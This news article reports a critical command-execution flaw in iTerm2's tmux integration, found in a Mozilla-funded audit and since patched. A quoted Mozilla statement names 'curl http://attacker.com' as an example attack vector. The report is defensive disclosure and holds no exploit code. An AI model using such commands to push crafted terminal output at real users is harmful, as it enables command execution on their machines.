A security audit of the popular iTerm2 terminal emulator for macOS has turned up a critical vulnerability that an attacker could use to execute commands on a vulnerable machine.
The bug lies in the tmux integration feature in iTerm2, which is used to allow for multiple terminal sessions in one window. It was discovered during an audit sponsored by Mozilla’s Open Source Support (MOSS) program, an initiative that, among other things, funds security audits of open-source projects. Many such projects are developed by individuals or small volunteer teams that might not otherwise have the time or resources to perform a security audit.
During the audit, Radically Open Security, which was performing the review with the backing of MOSS, discovered a serious flaw that has been in the iTerm2 code for at least seven years.
“An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer. Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log,” Tom Ritter of Mozilla said in a post.
“Typically this vulnerability would require some degree of user interaction or trickery; but because it can be exploited via commands generally considered safe there is a high degree of concern about the potential impact.”
The developer of iTerm2, George Nachman, released a new version of the software to fix the vulnerability and strongly encouraged users to upgrade as quickly as possible.
“This is a serious security issue because in some circumstances it could allow an attacker to execute commands on your machine when you view a file or otherwise receive input they have crafted in iTerm2,” he said.